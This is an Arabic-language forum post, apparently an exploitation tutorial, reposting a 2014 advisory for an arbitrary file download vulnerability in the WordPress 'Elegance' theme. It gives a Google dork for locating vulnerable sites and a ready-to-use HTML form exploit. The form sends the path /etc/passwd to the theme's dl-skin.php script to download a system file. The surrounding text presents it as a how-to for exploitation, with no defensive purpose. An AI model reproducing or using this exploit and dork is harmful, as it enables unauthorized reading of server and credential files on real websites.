شرح استغلال ثغرة File Download Vulnerability فى مواقع الورد بريس ثغرة جديدة














############################################################################

  

# Title : Wordpress Theme Elegance Arbitrary File Download Vulnerability  

  

# Author : Aloulou                                            

  

# Date : 19/06/2014                                                   

  

    

# Vendor : www.wordpress.org                                                    

  

# Google Dork : inurl:/wp-content/themes/elegance

  

# Tested on : Linux

                         

  

  

############################################################################

  

  

Exploit:

  

<html>

<body>

<form action="http://127.0.0.1/wp-content/themes/elegance/lib/scripts/dl-skin.php" method="POST">

<b>File</b>:<input type="text" name="_mysite_download_skin" value="/etc/passwd"><br>

<input type="submit" value=Download>

</form>

</body>

</html>

تم نشر الثغرة بالتفصيل اتمنى ان يكون الجميع قد فهم الثغرة

ملاحظة : الثغرة موجودة فى موقع الثغرت المعروف (1337day)

وتم شرحها هنا بالتفصيل




لا ترحل دون ان تضع بصمتك كلمة شكرا تكفى

ناتى الان الى شرح لاستغلال الثغرة

مشاهدة طيبة